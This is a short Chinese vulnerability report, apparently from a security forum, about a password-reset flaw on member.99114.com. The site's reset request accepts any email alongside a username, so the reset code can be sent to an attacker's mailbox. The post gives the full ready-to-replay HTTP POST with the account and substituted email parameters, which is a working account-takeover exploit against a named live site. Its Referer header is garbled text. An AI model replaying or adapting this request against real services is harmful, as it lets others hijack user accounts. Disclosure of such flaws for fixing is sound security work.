可以修改任意帐号的密码哦，当然危害很大了，99114.com的，到底有厂商帐号没？
找回密码的地方，其实是发送一个post请求，参数是邮件地址跟用户名，直接修改邮箱为自己的邮箱，就可以了，就会发生修改的验证码到自己的邮箱。

后面你懂的，

POST /login/sendPwdEmail HTTP/1.1

Host: member.99114.com

User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0

Accept: */*

Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

X-Requested-With: XMLHttpRequest

Referer: 6eaK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3#2W2L8h3u0W2M7W2)9J5k6e0V1&6x3e0p5@1i4K6u0W2j5$3!0E0i4K6u0r3N6X3W2W2N6#2)9J5c8X3k6A6L8X3c8H3j5i4y4K6N6$3!0J5k6q4)9J5c8Y4m8S2M7%4y4%4L8%4u0V1c8X3!0J5L8g2)9J5k6h3A6K6M7q4)9K6c8Y4y4A6N6r3g2u0k6q4)9K6c8o6f1`.

Content-Length: 34

Cookie:

Connection: keep-alive

Pragma: no-cache

Cache-Control: no-cache

account=99114&email=123@qq.com

[培训]科锐逆向工程师培训第53期2025年7月8日开班！